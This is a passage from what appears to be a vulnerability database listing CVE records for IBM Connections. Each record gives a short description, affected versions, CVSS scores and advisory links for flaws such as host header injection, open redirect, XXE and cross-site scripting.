            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 5.0, 5.5, and 6.0 is vulnerable to possible host header injection attack that could cause navigation to the attacker\u0027s domain. IBM X-Force ID: 152456."
                }
              ]
            },
            "impact": {
              "cvssv3": {
                "BM": {
                  "A": "N",
                  "AC": "L",
                  "AV": "N",
                  "C": "L",
                  "I": "L",
                  "PR": "L",
                  "S": "U",
                  "UI": "R"
                },
                "TM": {
                  "E": "U",
                  "RC": "C",
                  "RL": "O"
                }
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Gain Access"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "ibm-connections-cve20181896-head-injection(152456)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/152456"
                },
                {
                  "name": "https://www.ibm.com/support/docview.wss?uid=ibm10742567",
                  "refsource": "CONFIRM",
                  "url": "https://www.ibm.com/support/docview.wss?uid=ibm10742567"
                },
                {
                  "name": "106197",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/106197"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2018-1896",
        "datePublished": "2018-12-07T16:00:00.000Z",
        "dateReserved": "2017-12-13T00:00:00.000Z",
        "dateUpdated": "2024-09-16T22:25:00.146Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-1935 (GCVE-0-2018-1935)

    Vulnerability from nvd – Published: 2018-12-06 14:00 – Updated: 2024-09-17 01:01
    VLAI
    Summary
    IBM Connections 5.0, 5.5, and 6.0 could allow an authenticated user to obtain sensitive information from invalid request error messages. IBM X-Force ID: 153315.
    CWE
    • Obtain Information
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 5.0
    Affected: 5.5
    Affected: 6.0
    Create a notification for this product.
    Date Public
    2018-12-03 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T04:14:39.563Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://www.ibm.com/support/docview.wss?uid=ibm10742575"
              },
              {
                "name": "ibm-connections-cve20181935-info-disc(153315)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/153315"
              },
              {
                "name": "106134",
                "tags": [
                  "vdb-entry",
                  "x_refsource_BID",
                  "x_transferred"
                ],
                "url": "http://www.securityfocus.com/bid/106134"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.0"
                },
                {
                  "status": "affected",
                  "version": "5.5"
                },
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2018-12-03T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 5.0, 5.5, and 6.0 could allow an authenticated user to obtain sensitive information from invalid request error messages. IBM X-Force ID: 153315."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitCodeMaturity": "UNPROVEN",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "remediationLevel": "OFFICIAL_FIX",
                "reportConfidence": "CONFIRMED",
                "scope": "UNCHANGED",
                "temporalScore": 3.8,
                "temporalSeverity": "LOW",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/A:N/AC:L/AV:N/C:L/I:N/PR:L/S:U/UI:N/E:U/RC:C/RL:O",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Obtain Information",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-12-07T10:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://www.ibm.com/support/docview.wss?uid=ibm10742575"
            },
            {
              "name": "ibm-connections-cve20181935-info-disc(153315)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/153315"
            },
            {
              "name": "106134",
              "tags": [
                "vdb-entry",
                "x_refsource_BID"
              ],
              "url": "http://www.securityfocus.com/bid/106134"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2018-12-03T00:00:00",
              "ID": "CVE-2018-1935",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "5.0"
                              },
                              {
                                "version_value": "5.5"
                              },
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 5.0, 5.5, and 6.0 could allow an authenticated user to obtain sensitive information from invalid request error messages. IBM X-Force ID: 153315."
                }
              ]
            },
            "impact": {
              "cvssv3": {
                "BM": {
                  "A": "N",
                  "AC": "L",
                  "AV": "N",
                  "C": "L",
                  "I": "N",
                  "PR": "L",
                  "S": "U",
                  "UI": "N"
                },
                "TM": {
                  "E": "U",
                  "RC": "C",
                  "RL": "O"
                }
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Obtain Information"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://www.ibm.com/support/docview.wss?uid=ibm10742575",
                  "refsource": "CONFIRM",
                  "url": "https://www.ibm.com/support/docview.wss?uid=ibm10742575"
                },
                {
                  "name": "ibm-connections-cve20181935-info-disc(153315)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/153315"
                },
                {
                  "name": "106134",
                  "refsource": "BID",
                  "url": "http://www.securityfocus.com/bid/106134"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2018-1935",
        "datePublished": "2018-12-06T14:00:00.000Z",
        "dateReserved": "2017-12-13T00:00:00.000Z",
        "dateUpdated": "2024-09-17T01:01:51.214Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2018-1791 (GCVE-0-2018-1791)

    Vulnerability from nvd – Published: 2018-09-14 12:00 – Updated: 2024-09-17 01:56
    VLAI
    Summary
    IBM Connections 5.0, 5.5, and 6.0 is vulnerable to an External Service Interaction attack, caused by improper validation of a request property. By submitting suitable payloads, an attacker could exploit this vulnerability to induce the Connections server to attack other systems. IBM X-Force ID: 148946.
    CWE
    • Gain Access
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 5.0
    Affected: 5.5
    Affected: 6.0
    Create a notification for this product.
    Date Public
    2018-09-12 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T04:07:44.486Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "https://www.ibm.com/support/docview.wss?uid=ibm10731207"
              },
              {
                "name": "ibm-connections-cve20181791-esi(148946)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/148946"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.0"
                },
                {
                  "status": "affected",
                  "version": "5.5"
                },
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2018-09-12T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 5.0, 5.5, and 6.0 is vulnerable to an External Service Interaction attack, caused by improper validation of a request property. By submitting suitable payloads, an attacker could exploit this vulnerability to induce the Connections server to attack other systems. IBM X-Force ID: 148946."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "availabilityImpact": "LOW",
                "baseScore": 4.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitCodeMaturity": "UNPROVEN",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "remediationLevel": "OFFICIAL_FIX",
                "reportConfidence": "CONFIRMED",
                "scope": "CHANGED",
                "temporalScore": 4.3,
                "temporalSeverity": "MEDIUM",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/A:L/AC:H/AV:N/C:L/I:N/PR:L/S:C/UI:N/E:U/RC:C/RL:O",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Gain Access",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-09-14T11:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "https://www.ibm.com/support/docview.wss?uid=ibm10731207"
            },
            {
              "name": "ibm-connections-cve20181791-esi(148946)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/148946"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2018-09-12T00:00:00",
              "ID": "CVE-2018-1791",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "5.0"
                              },
                              {
                                "version_value": "5.5"
                              },
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 5.0, 5.5, and 6.0 is vulnerable to an External Service Interaction attack, caused by improper validation of a request property. By submitting suitable payloads, an attacker could exploit this vulnerability to induce the Connections server to attack other systems. IBM X-Force ID: 148946."
                }
              ]
            },
            "impact": {
              "cvssv3": {
                "BM": {
                  "A": "L",
                  "AC": "H",
                  "AV": "N",
                  "C": "L",
                  "I": "N",
                  "PR": "L",
                  "S": "C",
                  "UI": "N"
                },
                "TM": {
                  "E": "U",
                  "RC": "C",
                  "RL": "O"
                }
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Gain Access"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://www.ibm.com/support/docview.wss?uid=ibm10731207",
                  "refsource": "CONFIRM",
                  "url": "https://www.ibm.com/support/docview.wss?uid=ibm10731207"
                },
                {
                  "name": "ibm-connections-cve20181791-esi(148946)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/148946"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2018-1791",
        "datePublished": "2018-09-14T12:00:00.000Z",
        "dateReserved": "2017-12-13T00:00:00.000Z",
        "dateUpdated": "2024-09-17T01:56:13.984Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2017-1748 (GCVE-0-2017-1748)

    Vulnerability from nvd – Published: 2018-06-04 17:00 – Updated: 2024-09-16 19:00
    VLAI
    Summary
    IBM Connections 5.0, 5.5, and 6.0 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 135521.
    CWE
    • Gain Access
    Assigner
    ibm
    References
    Impacted products
    Vendor Product Version
    IBM Connections Affected: 5.0
    Affected: 5.5
    Affected: 6.0
    Create a notification for this product.
    Date Public
    2018-05-30 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-05T13:39:32.334Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www.ibm.com/support/docview.wss?uid=swg22016698"
              },
              {
                "name": "ibm-connections-cve20171748-open-redirect(135521)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/135521"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "Connections",
              "vendor": "IBM",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.0"
                },
                {
                  "status": "affected",
                  "version": "5.5"
                },
                {
                  "status": "affected",
                  "version": "6.0"
                }
              ]
            }
          ],
          "datePublic": "2018-05-30T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "IBM Connections 5.0, 5.5, and 6.0 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 135521."
            }
          ],
          "metrics": [
            {
              "cvssV3_0": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitCodeMaturity": "UNPROVEN",
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "remediationLevel": "OFFICIAL_FIX",
                "reportConfidence": "CONFIRMED",
                "scope": "CHANGED",
                "temporalScore": 5.9,
                "temporalSeverity": "MEDIUM",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/A:N/AC:L/AV:N/C:N/I:H/PR:L/S:C/UI:R/E:U/RC:C/RL:O",
                "version": "3.0"
              }
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "Gain Access",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-06-04T16:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www.ibm.com/support/docview.wss?uid=swg22016698"
            },
            {
              "name": "ibm-connections-cve20171748-open-redirect(135521)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/135521"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "DATE_PUBLIC": "2018-05-30T00:00:00",
              "ID": "CVE-2017-1748",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "Connections",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "5.0"
                              },
                              {
                                "version_value": "5.5"
                              },
                              {
                                "version_value": "6.0"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "IBM"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "IBM Connections 5.0, 5.5, and 6.0 could allow a remote attacker to conduct phishing attacks, using an open redirect attack. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to spoof the URL displayed to redirect a user to a malicious Web site that would appear to be trusted. This could allow the attacker to obtain highly sensitive information or conduct further attacks against the victim. IBM X-Force ID: 135521."
                }
              ]
            },
            "impact": {
              "cvssv3": {
                "BM": {
                  "A": "N",
                  "AC": "L",
                  "AV": "N",
                  "C": "N",
                  "I": "H",
                  "PR": "L",
                  "S": "C",
                  "UI": "R"
                },
                "TM": {
                  "E": "U",
                  "RC": "C",
                  "RL": "O"
                }
              }
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "Gain Access"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www.ibm.com/support/docview.wss?uid=swg22016698",
                  "refsource": "CONFIRM",
                  "url": "http://www.ibm.com/support/docview.wss?uid=swg22016698"
                },
                {
                  "name": "ibm-connections-cve20171748-open-redirect(135521)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/135521"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2017-1748",
        "datePublished": "2018-06-04T17:00:00.000Z",
        "dateReserved": "2016-11-30T00:00:00.000Z",
        "dateUpdated": "2024-09-16T19:00:52.157Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2015-7461 (GCVE-0-2015-7461)

    Vulnerability from nvd – Published: 2018-03-20 21:00 – Updated: 2024-08-06 07:51
    VLAI
    Summary
    XML external entity (XXE) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote authenticated users to cause a denial of service (memory consumption) via crafted XML data. IBM X-Force ID: 108357.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    ibm
    References
    Date Public
    2016-04-14 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T07:51:27.520Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "name": "ibm-connections-cve20157461-dos(108357)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108357"
              },
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2016-04-14T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "XML external entity (XXE) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote authenticated users to cause a denial of service (memory consumption) via crafted XML data. IBM X-Force ID: 108357."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-03-20T20:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "name": "ibm-connections-cve20157461-dos(108357)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108357"
            },
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "ID": "CVE-2015-7461",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "XML external entity (XXE) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote authenticated users to cause a denial of service (memory consumption) via crafted XML data. IBM X-Force ID: 108357."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "ibm-connections-cve20157461-dos(108357)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108357"
                },
                {
                  "name": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518",
                  "refsource": "CONFIRM",
                  "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2015-7461",
        "datePublished": "2018-03-20T21:00:00.000Z",
        "dateReserved": "2015-09-29T00:00:00.000Z",
        "dateUpdated": "2024-08-06T07:51:27.520Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2015-7460 (GCVE-0-2015-7460)

    Vulnerability from nvd – Published: 2018-03-20 21:00 – Updated: 2024-08-06 07:51
    VLAI
    Summary
    Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108356.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    ibm
    References
    Date Public
    2016-04-14 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T07:51:27.595Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
              },
              {
                "name": "ibm-connections-cve20157460-xss(108356)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108356"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2016-04-14T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108356."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-03-20T20:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
            },
            {
              "name": "ibm-connections-cve20157460-xss(108356)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108356"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "ID": "CVE-2015-7460",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "n/a"
                  }
                ]
              }
            },
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108356."
                }
              ]
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "n/a"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518",
                  "refsource": "CONFIRM",
                  "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
                },
                {
                  "name": "ibm-connections-cve20157460-xss(108356)",
                  "refsource": "XF",
                  "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108356"
                }
              ]
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
        "assignerShortName": "ibm",
        "cveId": "CVE-2015-7460",
        "datePublished": "2018-03-20T21:00:00.000Z",
        "dateReserved": "2015-09-29T00:00:00.000Z",
        "dateUpdated": "2024-08-06T07:51:27.595Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2015-7459 (GCVE-0-2015-7459)

    Vulnerability from nvd – Published: 2018-03-20 21:00 – Updated: 2024-08-06 07:51
    VLAI
    Summary
    Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108355.
    Severity
    No CVSS data available.
    CWE
    • n/a
    Assigner
    ibm
    References
    Date Public
    2016-04-14 00:00
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-06T07:51:27.580Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "x_refsource_CONFIRM",
                  "x_transferred"
                ],
                "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
              },
              {
                "name": "ibm-connections-cve20157459-xss(108355)",
                "tags": [
                  "vdb-entry",
                  "x_refsource_XF",
                  "x_transferred"
                ],
                "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108355"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "n/a",
              "vendor": "n/a",
              "versions": [
                {
                  "status": "affected",
                  "version": "n/a"
                }
              ]
            }
          ],
          "datePublic": "2016-04-14T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Cross-site scripting (XSS) vulnerability in IBM Connections 3.0.1.1 and earlier, 4.0, 4.5, and 5.0 before CR4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. IBM X-Force ID: 108355."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "description": "n/a",
                  "lang": "en",
                  "type": "text"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2018-03-20T20:57:01.000Z",
            "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522",
            "shortName": "ibm"
          },
          "references": [
            {
              "tags": [
                "x_refsource_CONFIRM"
              ],
              "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21980518"
            },
            {
              "name": "ibm-connections-cve20157459-xss(108355)",
              "tags": [
                "vdb-entry",
                "x_refsource_XF"
              ],
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/108355"
            }
          ],
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "psirt@us.ibm.com",
              "ID": "CVE-2015-7459",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "n/a",
                          "version": {
                            "version_data": [
                              {
                                "version_value": "n/a"
                              }
                            ]
                          }
                        }
                      ]
                    },
